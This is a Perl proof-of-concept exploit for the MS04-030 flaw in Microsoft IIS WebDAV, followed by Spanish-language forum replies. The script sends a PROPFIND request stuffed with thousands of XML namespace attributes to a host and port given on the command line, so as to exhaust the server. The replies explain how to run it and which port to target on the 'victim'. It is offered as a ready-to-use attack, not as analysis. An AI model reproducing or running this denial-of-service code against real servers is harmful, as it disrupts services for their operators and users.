#!/usr/bin/perl
# IIS BlowOut
# POC exploit for MS04-030. Found by Amit Klein.
# incognito_ergo yahoo com
# usage: perl ms04-030_spl.pl host port

use IO::Socket;

$port = @ARGV[1];
$host = @ARGV[0];


$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>
$port,Proto => "TCP");


for ($count=1; $count<9999; $count++) #more than nuff
{

$xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" ";

}



$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " .
$xmlatt .
">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";

$l=length($xmldata);

$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:
$host\nContent-length: $l\n\n$xmldata\n\n";

syswrite($socket,$req,length($req));

close $socket;

Mas informacion?
El titulo lo dice todo....
Y podes buscarlo (MS04-030).
Saludos

P.D.:
Lo saque de un newsgroup privado de seguridad.
Pero casi seguro lo ya lo podes encontrar dando vueltas por cualquier lado.

Ahi mismo lo dice mira bien.
usage: perl ms04-030_spl.pl host port

Saludos

Mr. Dialup... o nos tomas el pelo, o no te has dado cuenta de lo que va este tema. Mira el titulo y veras que pone: "Microsoft IIS WebDav ...". Que puerto crees que habra que poner?

pues el puerto donde este corriendo este servidor en la victima...